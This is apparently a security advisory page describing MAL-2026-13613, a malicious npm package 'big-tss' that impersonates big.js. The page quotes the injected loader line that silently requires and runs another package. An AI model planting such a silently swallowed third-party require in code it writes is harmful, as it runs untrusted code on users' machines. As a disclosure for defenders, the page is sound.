Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ MAL-2026-13613 — big-tss

⚪ Unknown ✅ No Known Exploit OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Malicious code in big-tss (npm)

Source: amazon-inspector

[email protected] impersonates the popular big.js arbitrary-precision math library and ships upstream big.js source with an injected block at the top of the main module: try { const doc = require("npm-doc-dev"); doc.from_str() } catch (error) {}. On any require('big-tss') this synchronously loads and executes the top-level code of npm-doc-dev — a package outside the big.js publisher — and calls a method on it, with a bare try/catch swallowing any failure so the load is silent. The package.json declares a different dependency name, npm-dc-dev, than the code actually requires (npm-doc-dev), so the declared dependency tree does not reflect the module that is actually loaded at import time. The name resemblance to big.js, the divergence between declared and required dependency names, and the empty catch around the injected require together form a trojan-dropper pattern in which arbitrary code from a third party is executed on the installer's machine whenever a consumer imports the package.

Affected software

MAL-2026-13613 is recorded against 1 package.

  • big-tss

Timeline and source

Published on 7 August 2026 and last revised on 19 August 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

www.npmjs.com (Package)
www.npmjs.com (Package)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector N/A
CWE N/A
Public Exploit ✅ No
Source OSV
Published 2026-08-07
Updated 2026-08-20
Modified 2026-08-19
Fix URL N/A

Affected Packages

Software From version Fixed in
big-tss

Free Vulnerability Check

Is your site affected by MAL-2026-13613?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against MAL-2026-13613 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesMalicious packagesMalicious packages 2026